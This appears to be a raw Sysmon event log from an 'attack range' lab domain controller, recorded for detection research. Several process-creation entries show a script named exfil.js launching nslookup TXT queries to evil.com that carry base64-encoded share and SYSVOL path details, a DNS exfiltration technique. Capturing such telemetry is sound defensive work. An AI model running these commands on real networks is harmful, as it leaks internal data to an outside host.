14:16:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CD41-000000005F02}388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-17A1-629A-783D-000000005F02}55527760C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-CD41-000000005F02}388C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.647{2E1864BB-17CB-629A-CD41-000000005F02}388C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldajwkc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.640{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltdnfll.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.608{2E1864BB-17CB-629A-CB41-000000005F02}58247980C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-CC41-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CC41-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.593{2E1864BB-17CB-629A-CA41-000000005F02}53647920C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-CC41-000000005F02}7200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.604{2E1864BB-17CB-629A-CC41-000000005F02}7200C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-CA41-000000005F02}5364C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdnfll.tmp 2>&1 10341000x8000000000000000203730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.561{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-CB41-000000005F02}5824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.561{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-CB41-000000005F02}5824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.561{2E1864BB-17CB-629A-CB41-000000005F02}58247980C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-CA41-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.555{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CB41-000000005F02}5824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-CA41-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-17A1-629A-783D-000000005F02}55525992C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-CA41-000000005F02}5364C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.547{2E1864BB-17CB-629A-CA41-000000005F02}5364C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdnfll.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.540{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrolfpt.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.508{2E1864BB-17CB-629A-C841-000000005F02}75764864C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C941-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 